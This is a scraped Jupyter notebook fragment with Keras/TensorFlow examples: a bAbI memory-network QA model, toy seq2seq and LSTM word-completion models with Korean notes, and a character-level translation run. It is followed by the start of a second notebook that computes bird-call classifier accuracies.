\nprint('queries_test shape:', queries_test.shape) \nprint('query train sample', queries_train[0,:]) \n\n \nprint('-------------------------') \nprint('answers: binary (1 or 0) tensor of shape (samples, vocab_size)') \nprint('answers_train shape:', answers_train.shape) \nprint('answers_test shape:', answers_test.shape) \nprint('answer train sample', answers_train[0,:]) \nprint('-------------------------')\n \n \n \n ", "_____no_output_____" ], [ "train_epochs = 100\nbatch_size = 32\nlstm_size = 64\nembed_size = 50\ndropout_rate = 0.3\n\n\n# placeholders\ninput_sequence = Input((story_maxlen,))\nquestion = Input((query_maxlen,))\n\nprint('Input sequence:', input_sequence)\nprint('Question:', question)\n\n# encoders\n# embed the input sequence into a sequence of vectors\ninput_encoder_m = Sequential()\ninput_encoder_m.add(Embedding(input_dim=vocab_size,\n output_dim=embed_size))\ninput_encoder_m.add(Dropout(dropout_rate))\n# output: (samples, story_maxlen, embedding_dim)\n\n# embed the input into a sequence of vectors of size query_maxlen\ninput_encoder_c = Sequential()\ninput_encoder_c.add(Embedding(input_dim=vocab_size,\n output_dim=query_maxlen))\ninput_encoder_c.add(Dropout(dropout_rate))\n# output: (samples, story_maxlen, query_maxlen)\n\n# embed the question into a sequence of vectors\nquestion_encoder = Sequential()\nquestion_encoder.add(Embedding(input_dim=vocab_size,\n output_dim=embed_size,\n input_length=query_maxlen))\nquestion_encoder.add(Dropout(dropout_rate))\n# output: (samples, query_maxlen, embedding_dim)\n\n# encode input sequence and questions (which are indices)\n# to sequences of dense vectors\ninput_encoded_m = input_encoder_m(input_sequence)\nprint('Input encoded m', input_encoded_m)\ninput_encoded_c = input_encoder_c(input_sequence)\nprint('Input encoded c', input_encoded_c)\nquestion_encoded = question_encoder(question)\nprint('Question encoded', question_encoded)\n\n\n# compute a 'match' between the first input vector sequence\n# and the question vector sequence\n# shape: `(samples, story_maxlen, query_maxlen)\nmatch = dot([input_encoded_m, question_encoded], axes=-1, normalize=False)\nprint(match.shape)\nmatch = Activation('softmax')(match)\nprint('Match shape', match.shape)\n\n# add the match matrix with the second input vector sequence\nresponse = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen)\nresponse = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen)\nprint('Response shape', response)\n\n# concatenate the response vector with the question vector sequence\nanswer = concatenate([response, question_encoded])\nprint('Answer shape', answer)\n\nanswer = LSTM(lstm_size)(answer) # Generate tensors of shape 32\nanswer = Dropout(dropout_rate)(answer)\nanswer = Dense(vocab_size)(answer) # (samples, vocab_size)\n# we output a probability distribution over the vocabulary\nanswer = Activation('softmax')(answer)\n\n# build the final model\nmodel = Model([input_sequence, question], answer)\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.summary()\n\nmodel.fit([inputs_train, queries_train], answers_train, batch_size, train_epochs, callbacks=[TrainingVisualizer()],\n validation_data=([inputs_test, queries_test], answers_test))\n\nmodel.save('model.h5')\n\n\nfor i in range(0,10):\n current_inp = test_stories[i]\n current_story, current_query, current_answer = vectorize_stories([current_inp], word_idx, story_maxlen, query_maxlen)\n current_prediction = model.predict([current_story, 
current_query])\n current_prediction = idx_word[np.argmax(current_prediction)]\n print(' '.join(current_inp[0]), ' '.join(current_inp[1]), '| Prediction:', current_prediction, '| Ground Truth:', current_inp[2])\n print(\"-----------------------------------------------------------------------------------------\")\n ", "_____no_output_____" ], [ "# print('-------------------------------------------------------------------------------------------')\n# print('Custom User Queries (Make sure there are spaces before each word)')\n# while 1:\n# print('-------------------------------------------------------------------------------------------')\n# print('Please input a story')\n# user_story_inp = input().split(' ')\n# print('Please input a query')\n# user_query_inp = input().split(' ')\n# user_story, user_query, user_ans = vectorize_stories([[user_story_inp, user_query_inp, '.']], word_idx, story_maxlen, query_maxlen)\n# user_prediction = model.predict([user_story, user_query])\n# user_prediction = idx_word[np.argmax(user_prediction)]\n# print('Result')\n# print(' '.join(user_story_inp), ' '.join(user_query_inp), '| Prediction:', user_prediction)\n\n# Mary went to the bathroom . John moved to the hallway . Mary travelled to the office . # Where is Mary ?\n# Sandra travelled to the office . John journeyed to the garden .", "_____no_output_____" ] ], [ [ "# ====================================\n\n<p> &nbsp;\n\n# [생각] 영어 데이터를 한글 번역기로 번역을 시킨다.\n\n<p> &nbsp;\n \n# [생각] 한글용 Babi 데이터로 한글 QA 만들어본다.\n\n<p> &nbsp;\n \n# [생각] 수학학습 질문과 답변 데이터로 만들어본다.\n\n<p> &nbsp;", "_____no_output_____" ], [ "# web 버젼, attention 버젼\n\n\n# https://github.com/vinhkhuc/MemN2N-babi-python", "_____no_output_____" ], [ "# ++++++++++++++++++++++++++++++++++\n\n<p> &nbsp;\n\n# sequence 2 sequence 실험 \n\n<p> &nbsp;", "_____no_output_____" ], [ "![title](images/seq2seq.png)", "_____no_output_____" ] ], [ [ "import tensorflow.compat.v1 as tf\ntf.disable_eager_execution()\n\nimport numpy as np\n\nchar_arr = [c for c in \"SEPabcdefghijklmnopqrstuvwxyz단어나무놀이소녀키스사랑봉구우루\"]\nnum_dic = {n: i for i, n in enumerate(char_arr)}\ndic_len = len(num_dic)\n\nseq_data = [['word', \"단어\"], [\"wood\", \"나무\"], [\"game\", \"놀이\"], [\"girl\", \"소녀\"], \n [\"kiss\", \"키스\"], [\"love\", \"사랑\"], [\"bong\", \"봉구\"], [\"uruu\", \"우루\"]]", "_____no_output_____" ], [ "def make_batch(seq_data):\n input_batch = []\n output_batch = []\n target_batch = []\n \n for seq in seq_data:\n input = [num_dic[n] for n in seq[0]]\n output = [num_dic[n] for n in (\"S\" + seq[1])]\n target = [num_dic[n] for n in (seq[1] + \"E\")]\n \n input_batch.append(np.eye(dic_len)[input])\n output_batch.append(np.eye(dic_len)[output])\n target_batch.append(target)\n \n return input_batch, output_batch, target_batch", "_____no_output_____" ], [ "learning_rate = 0.001\nn_hidden = 128\ntotal_epoch = 1000\n\nn_class = n_input = dic_len\n\nenc_input = tf.placeholder(tf.float32, [None, None, n_input])\ndec_input = tf.placeholder(tf.float32, [None, None, n_input])\ntargets = tf.placeholder(tf.int64, [None, None])\n\n\n# encoder: [batch size, time steps, input size]\n# decoder: [batch size, time steps]\n\nwith tf.variable_scope(\"encode\"):\n enc_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)\n enc_cell = tf.nn.rnn_cell.DropoutWrapper(enc_cell, output_keep_prob=0.5)\n \n outputs, enc_states = tf.nn.dynamic_rnn(enc_cell, enc_input, dtype=tf.float32)\n \nwith tf.variable_scope(\"decode\"):\n dec_cell = tf.nn.rnn_cell.BasicRNNCell(n_hidden)\n dec_cell = tf.nn.rnn_cell.DropoutWrapper(enc_cell, 
output_keep_prob=0.5)\n \n outputs, dec_stats = tf.nn.dynamic_rnn(dec_cell, dec_input, \n initial_state=enc_states, dtype=tf.float32)\n", "WARNING:tensorflow:From <ipython-input-6-8ef07e5ed546>:16: BasicRNNCell.__init__ (from tensorflow.python.ops.rnn_cell_impl) is deprecated and will be removed in a future version.\nInstructions for updating:\nThis class is equivalent as tf.keras.layers.SimpleRNNCell, and will be replaced by that in Tensorflow 2.0.\nWARNING:tensorflow:From <ipython-input-6-8ef07e5ed546>:19: dynamic_rnn (from tensorflow.python.ops.rnn) is deprecated and will be removed in a future version.\nInstructions for updating:\nPlease use `keras.layers.RNN(cell)`, which is equivalent to this API\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\ops\\rnn_cell_impl.py:456: Layer.add_variable (from tensorflow.python.keras.engine.base_layer) is deprecated and will be removed in a future version.\nInstructions for updating:\nPlease use `layer.add_weight` method instead.\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\ops\\resource_variable_ops.py:1630: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version.\nInstructions for updating:\nIf using Keras pass *_constraint arguments to layers.\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\ops\\rnn_cell_impl.py:460: calling Zeros.__init__ (from tensorflow.python.ops.init_ops) with dtype is deprecated and will be removed in a future version.\nInstructions for updating:\nCall initializer instance with the dtype argument instead of passing it to the constructor\n" ], [ "model = tf.layers.dense(outputs, n_class, activation=None)\ncost = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=model, labels=targets\n )\n)\nopt = tf.train.AdamOptimizer(learning_rate).minimize(cost)", "WARNING:tensorflow:From <ipython-input-7-e5334240e8e5>:1: dense (from tensorflow.python.layers.core) is deprecated and will be removed in a future version.\nInstructions for updating:\nUse keras.layers.Dense instead.\nWARNING:tensorflow:From C:\\WinPython37F\\python-3.7.2.amd64\\lib\\site-packages\\tensorflow_core\\python\\layers\\core.py:187: Layer.apply (from tensorflow.python.keras.engine.base_layer) is deprecated and will be removed in a future version.\nInstructions for updating:\nPlease use `layer.__call__` method instead.\n" ], [ "init = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\ninput_batch, output_batch, target_batch = make_batch(seq_data)\n\ncost_val = []\nfor epoch in range(total_epoch):\n _, loss = sess.run([opt, cost], feed_dict={enc_input: input_batch,\n dec_input: output_batch,\n targets: target_batch})\n cost_val.append(loss)\n \n if (epoch+1) % 200 ==0:\n print(\"Epoch: {:04d}, cost: {}\".format(epoch+1, loss))\n \n \nprint(\"\\noptimization complete\")", "Epoch: 0200, cost: 0.07781609892845154\nEpoch: 0400, cost: 0.025294050574302673\nEpoch: 0600, cost: 0.008742648176848888\nEpoch: 0800, cost: 0.004197845701128244\nEpoch: 1000, cost: 0.008464171551167965\n\noptimization complete\n" ], [ "import matplotlib.pyplot as plt\n%matplotlib inline\n\nplt.rcParams[\"axes.unicode_minus\"] = False\n\nplt.figure(figsize=(20, 10))\nplt.title(\"cost\")\nplt.plot(cost_val, linewidth=1, alpha=0.8)\nplt.show()", "_____no_output_____" ], [ 
"def translate(word):\n seq_data = [word, \"P\" * len(word)]\n \n input_batch, output_batch, target_batch = make_batch([seq_data])\n prediction = tf.argmax(model, 2)\n \n result = sess.run(prediction, feed_dict={enc_input: input_batch,\n dec_input: output_batch,\n targets: target_batch})\n decoded = [char_arr[i] for i in result[0]]\n \n try:\n end = decoded.index(\"E\")\n translated = \"\".join(decoded[:end])\n return translated\n \n except Exception as ex:\n pass\n \n \n \n \n \nprint(\"\\n ==== translate test ====\")\n\nprint(\"word -> {}\".format(translate(\"word\")))\nprint(\"wodr -> {}\".format(translate(\"wodr\")))\nprint(\"love -> {}\".format(translate(\"love\")))\nprint(\"loev -> {}\".format(translate(\"loev\")))\nprint(\"bogn -> {}\".format(translate(\"bogn\")))\nprint(\"uruu -> {}\".format(translate(\"uruu\")))\nprint(\"abcd -> {}\".format(translate(\"abcd\")))", "\n ==== translate test ====\nword -> 단어\nwodr -> 단무\nlove -> 사랑\nloev -> 사랑\nbogn -> 봉구\nuruu -> 우루\nabcd -> 놀봉구\n" ] ], [ [ "# 자동 단어 완성 !! (3글자 ==> 4글자)", "_____no_output_____" ], [ "![title](images/word_auto.png)", "_____no_output_____" ] ], [ [ "import tensorflow.compat.v1 as tf\nimport numpy as np\n\nchar_arr = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\",\n \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\",\n \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\",\n \"v\", \"w\", \"x\", \"y\", \"z\"]\n\nnum_dic = {n: i for i, n in enumerate(char_arr)}\ndic_len = len(num_dic)\n\n\nseq_data = [\"word\", \"wood\", \"deep\", \"dive\", \"cold\", \"cool\", \"load\", \"love\", \"kiss\", \"kind\"]", "_____no_output_____" ], [ "def make_batch(seq_data):\n input_batch = []\n target_batch = []\n \n for seq in seq_data:\n input = [num_dic[n] for n in seq[:-1]]\n target = num_dic[seq[-1]]\n input_batch.append(np.eye(dic_len)[input])\n target_batch.append(target)\n \n return input_batch, target_batch", "_____no_output_____" ], [ "learning_rate = 0.001\nn_hidden = 128\ntotal_epoch = 10000\n\nn_step = 3\nn_input = n_class = dic_len\n\n\n\nX = tf.placeholder(tf.float32, [None, n_step, n_input], name=\"input_X\")\nY = tf.placeholder(tf.int32, [None])\n\nW = tf.Variable(tf.random_normal([n_hidden, n_class]))\nb = tf.Variable(tf.random_normal([n_class]))\n\n\n", "_____no_output_____" ], [ "cell1 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)\ncell1 = tf.nn.rnn_cell.DropoutWrapper(cell1, output_keep_prob=0.5)\ncell2 = tf.nn.rnn_cell.BasicLSTMCell(n_hidden)\n\n# MultiRNNCell 함수를 사용하여 조합\nmulti_cell = tf.nn.rnn_cell.MultiRNNCell([cell1, cell2])\noutputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)\n\n\noutputs = tf.transpose(outputs, [1, 0, 2])\noutputs = outputs[-1]\nmodel = tf.matmul(outputs, W) + b", "WARNING:tensorflow:From <ipython-input-15-7ed5499ca873>:1: BasicLSTMCell.__init__ (from tensorflow.python.ops.rnn_cell_impl) is deprecated and will be removed in a future version.\nInstructions for updating:\nThis class is equivalent as tf.keras.layers.LSTMCell, and will be replaced by that in Tensorflow 2.0.\nWARNING:tensorflow:From <ipython-input-15-7ed5499ca873>:6: MultiRNNCell.__init__ (from tensorflow.python.ops.rnn_cell_impl) is deprecated and will be removed in a future version.\nInstructions for updating:\nThis class is equivalent as tf.keras.layers.StackedRNNCells, and will be replaced by that in Tensorflow 2.0.\n" ], [ "cost = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(logits=model, labels=Y) \n)\nopt = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n", "_____no_output_____" ], [ 
"init = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\ninput_batch, output_batch = make_batch(seq_data)\n\ncost_epoch = []\nfor epoch in range(total_epoch):\n _, loss = sess.run([opt, cost], feed_dict={X: input_batch, Y: output_batch})\n cost_epoch.append(loss)\n \n if (epoch+1) % 2000 ==0:\n print(\"Epoch: {}, cost= {}\".format(epoch+1, loss))\n \nprint(\"\\noptimization complete\")", "Epoch: 2000, cost= 4.428016836754978e-05\nEpoch: 4000, cost= 1.1086447102570673e-06\nEpoch: 6000, cost= 0.00020040673553012311\nEpoch: 8000, cost= 1.192092824453539e-08\nEpoch: 10000, cost= 3.576278473360617e-08\n\noptimization complete\n" ], [ "import matplotlib.pyplot as plt\n%matplotlib inline\n\n\nplt.rcParams[\"axes.unicode_minus\"] = False\nplt.figure(figsize=(20,6))\nplt.title(\"cost\")\nplt.plot(cost_epoch, linewidth=1)\nplt.show()", "_____no_output_____" ], [ "prediction = tf.cast(tf.argmax(model, 1), tf.int32)\nprediction_check = tf.equal(prediction, Y)\naccuracy = tf.reduce_mean(tf.cast(prediction_check, tf.float32))\n\n\ninput_batch, target_batch = make_batch(seq_data)\n\npredict, accuracy_val = sess.run([prediction, accuracy], \n feed_dict={X: input_batch, Y: target_batch})\n\n\n\npredict_word = []\nfor idx, val in enumerate(seq_data):\n last_char = char_arr[predict[idx]]\n predict_word.append(val[:3] + last_char)\n \nprint(\"\\n==== prediction ====\")\nprint(\"input_value: \\t\\t{}\".format([w[:3] for w in seq_data]))\nprint(\"prediction_value: \\t{}\".format(predict_word))\nprint(\"accuracy: {:.3f}\".format(accuracy_val))\n\n\n\n\n", "\n==== prediction ====\ninput_value: \t\t['wor', 'woo', 'dee', 'div', 'col', 'coo', 'loa', 'lov', 'kis', 'kin']\nprediction_value: \t['word', 'wood', 'deep', 'dive', 'cold', 'cool', 'load', 'love', 'kiss', 'kind']\naccuracy: 1.000\n" ] ], [ [ "# 4.ipynb 에서 attention 개념 위해 사용하는 toy 코드\n\n<p> &nbsp;\n \n# +++++++++++++++++++++++++++++++++++++++++++++++++++\n \n<p> &nbsp;\n \n### [과제] 실행시간이 오래 걸림 . 저장된 모델 불러오는 기능을 추가. 
\n \n### [과제] 구글 번역기로 한글 charbot 데이터를 영어로 번역하고 탐구.", "_____no_output_____" ] ], [ [ "from __future__ import print_function\n\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense\nimport numpy as np\n\nbatch_size = 64 # Batch size for training.\nepochs = 3 # 100 # Number of epochs to train for.\nlatent_dim = 256 # Latent dimensionality of the encoding space.\nnum_samples = 10000 # Number of samples to train on.\n# Path to the data txt file on disk.\ndata_path = 'data_nmt/data/kor.txt'\n\n# Vectorize the data.\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\nwith open(data_path, 'r', encoding='utf-8') as f:\n lines = f.read().split('\\n')\nfor line in lines[: min(num_samples, len(lines) - 1)]:\n input_text, target_text, rest = line.split('\\t')\n # We use \"tab\" as the \"start sequence\" character\n # for the targets, and \"\\n\" as \"end sequence\" character.\n target_text = '\\t' + target_text + '\\n'\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n if char not in input_characters:\n input_characters.add(char)\n for char in target_text:\n if char not in target_characters:\n target_characters.add(char)\n\ninput_characters = sorted(list(input_characters))\ntarget_characters = sorted(list(target_characters))\nnum_encoder_tokens = len(input_characters)\nnum_decoder_tokens = len(target_characters)\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\ninput_token_index = dict(\n [(char, i) for i, char in enumerate(input_characters)])\ntarget_token_index = dict(\n [(char, i) for i, char in enumerate(target_characters)])\n\nencoder_input_data = np.zeros(\n (len(input_texts), max_encoder_seq_length, num_encoder_tokens),\n dtype='float32')\ndecoder_input_data = np.zeros(\n (len(input_texts), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\ndecoder_target_data = np.zeros(\n (len(input_texts), max_decoder_seq_length, num_decoder_tokens),\n dtype='float32')\n\nfor i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):\n for t, char in enumerate(input_text):\n encoder_input_data[i, t, input_token_index[char]] = 1.\n encoder_input_data[i, t + 1:, input_token_index[' ']] = 1.\n for t, char in enumerate(target_text):\n # decoder_target_data is ahead of decoder_input_data by one timestep\n decoder_input_data[i, t, target_token_index[char]] = 1.\n if t > 0:\n # decoder_target_data will be ahead by one timestep\n # and will not include the start character.\n decoder_target_data[i, t - 1, target_token_index[char]] = 1.\n decoder_input_data[i, t + 1:, target_token_index[' ']] = 1.\n decoder_target_data[i, t:, target_token_index[' ']] = 1.\n# Define an input sequence and process it.\nencoder_inputs = Input(shape=(None, num_encoder_tokens))\nencoder = LSTM(latent_dim, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# We discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, num_decoder_tokens))\n# We set up our decoder to 
return full output sequences,\n# and to return internal states as well. We don't use the\n# return states in the training model, but we will use them in inference.\ndecoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs,\n initial_state=encoder_states)\ndecoder_dense = Dense(num_decoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n# Run training\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=0.2)\n# Save model\nmodel.save('./data_nmt/data/s2s.h5')\n\n# Next: inference mode (sampling).\n# Here's the drill:\n# 1) encode input and retrieve initial decoder state\n# 2) run one step of decoder with this initial state\n# and a \"start of sequence\" token as target.\n# Output will be the next target token\n# 3) Repeat with the current target token and current states\n\n# Define sampling models\nencoder_model = Model(encoder_inputs, encoder_states)\n\ndecoder_state_input_h = Input(shape=(latent_dim,))\ndecoder_state_input_c = Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\ndecoder_outputs, state_h, state_c = decoder_lstm(\n decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = decoder_dense(decoder_outputs)\ndecoder_model = Model(\n [decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states)\n\n# Reverse-lookup token index to decode sequences back to\n# something readable.\nreverse_input_char_index = dict(\n (i, char) for char, i in input_token_index.items())\nreverse_target_char_index = dict(\n (i, char) for char, i in target_token_index.items())\n\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n states_value = encoder_model.predict(input_seq)\n\n # Generate empty target sequence of length 1.\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n # Populate the first character of target sequence with the start character.\n target_seq[0, 0, target_token_index['\\t']] = 1.\n\n # Sampling loop for a batch of sequences\n # (to simplify, here we assume a batch of size 1).\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition:\n output_tokens, h, c = decoder_model.predict(\n [target_seq] + states_value)\n\n # Sample a token\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char\n\n # Exit condition: either hit max length\n # or find stop character.\n if (sampled_char == '\\n' or\n len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n\n # Update the target sequence (of length 1).\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n\n # Update states\n states_value = [h, c]\n\n return decoded_sentence\n\n\nfor seq_index in range(100):\n # Take one sequence (part of the training set)\n # for trying out decoding.\n input_seq = encoder_input_data[seq_index: seq_index + 1]\n decoded_sentence = decode_sequence(input_seq)\n print('-')\n print('Input sentence:', input_texts[seq_index])\n print('Decoded sentence:', 
decoded_sentence)", "Number of samples: 3318\nNumber of unique input tokens: 75\nNumber of unique output tokens: 891\nMax sequence length for inputs: 537\nMax sequence length for outputs: 298\nTrain on 2654 samples, validate on 664 samples\nEpoch 1/100\n2654/2654 [==============================] - 473s 178ms/step - loss: 0.6580 - accuracy: 0.9389 - val_loss: 0.4219 - val_accuracy: 0.9375\nEpoch 2/100\n2654/2654 [==============================] - 570s 215ms/step - loss: 0.2244 - accuracy: 0.9626 - val_loss: 0.4568 - val_accuracy: 0.9375\nEpoch 3/100\n 192/2654 [=>............................] - ETA: 9:17 - loss: 0.2123 - accuracy: 0.9642" ] ] ]
[ "markdown", "raw", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "raw" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1c2999e9f0d97c67c520bbfed9c6feeb6210ab
616,756
ipynb
Jupyter Notebook
spl2018/fig_binary-classification.ipynb
BirdVox/bv_context_adaptation
9bd446326ac927d72f7c333eac07ee0490fc3127
[ "MIT" ]
5
2018-10-17T21:17:26.000Z
2019-06-14T01:48:29.000Z
spl2018/fig_binary-classification.ipynb
BirdVox/bv_context_adaptation
9bd446326ac927d72f7c333eac07ee0490fc3127
[ "MIT" ]
null
null
null
spl2018/fig_binary-classification.ipynb
BirdVox/bv_context_adaptation
9bd446326ac927d72f7c333eac07ee0490fc3127
[ "MIT" ]
3
2018-12-22T00:04:43.000Z
2021-06-09T20:02:28.000Z
245.523885
107,864
0.891669
[ [ [ "import csv\nimport numpy as np\nimport os\nimport pandas as pd\nimport scipy.interpolate\nimport sklearn.metrics\nimport sys\nsys.path.append(\"../src\")\nimport localmodule\n\n\nif sys.version_info[0] < 3: \n from StringIO import StringIO\nelse:\n from io import StringIO\n\n\nfrom matplotlib import pyplot as plt\n%matplotlib inline\n\n# Define constants.\ndataset_name = localmodule.get_dataset_name()\nmodels_dir = localmodule.get_models_dir()\nunits = localmodule.get_units()\nn_units = len(units)\nn_trials = 10\n", "_____no_output_____" ], [ "import tqdm\n\nmodel_names = [\n \"icassp-convnet\", \"icassp-convnet_aug-all-but-noise\", \"icassp-convnet_aug-all\", \n \"pcen-convnet\", \"pcen-convnet_aug-all-but-noise\", \"pcen-convnet_aug-all\",\n \"icassp-ntt-convnet\", \"icassp-ntt-convnet_aug-all-but-noise\", \"icassp-ntt-convnet_aug-all\",\n \"pcen-ntt-convnet\", \"pcen-ntt-convnet_aug-all-but-noise\", \"pcen-ntt-convnet_aug-all\",\n \"icassp-add-convnet\", \"icassp-add-convnet_aug-all-but-noise\", \"icassp-add-convnet_aug-all\",\n \"pcen-add-convnet\", \"pcen-add-convnet_aug-all-but-noise\", \"pcen-add-convnet_aug-all\",\n]\n\nn_models = len(model_names)\n\n\nfold_accs = []\nfor fold_id in range(6):\n\n model_accs = {}\n\n for model_name in tqdm.tqdm(model_names):\n \n val_accs = []\n \n for trial_id in range(10):\n\n model_dir = os.path.join(models_dir, model_name)\n test_unit_str = units[fold_id]\n test_unit_dir = os.path.join(model_dir, test_unit_str)\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n \n val_unit_strs = localmodule.fold_units()[fold_id][2]\n \n val_tn = 0\n val_tp = 0\n val_fn = 0\n val_fp = 0\n \n for val_unit_str in val_unit_strs:\n\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + val_unit_str,\n \"clip-predictions.csv\"\n ])\n\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n # Load prediction.\n try:\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n\n y_pred = (y_pred > 0.5).astype('int')\n\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n\n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n\n val_tn = val_tn + tn\n val_fp = val_fp + fp\n val_fn = val_fn + fn\n val_tp = val_tp + tp\n\n except:\n val_tn = -np.inf\n val_tp = -np.inf\n val_fn = -np.inf\n val_tp = -np.inf\n \n if val_tn < 0:\n val_acc = 0.0\n else:\n val_acc =\\\n 100 * (val_tn+val_tp) /\\\n (val_tn+val_tp+val_fn+val_fp)\n \n val_accs.append(val_acc)\n \n # Remove the models that did not train (accuracy close to 50%, i.e. 
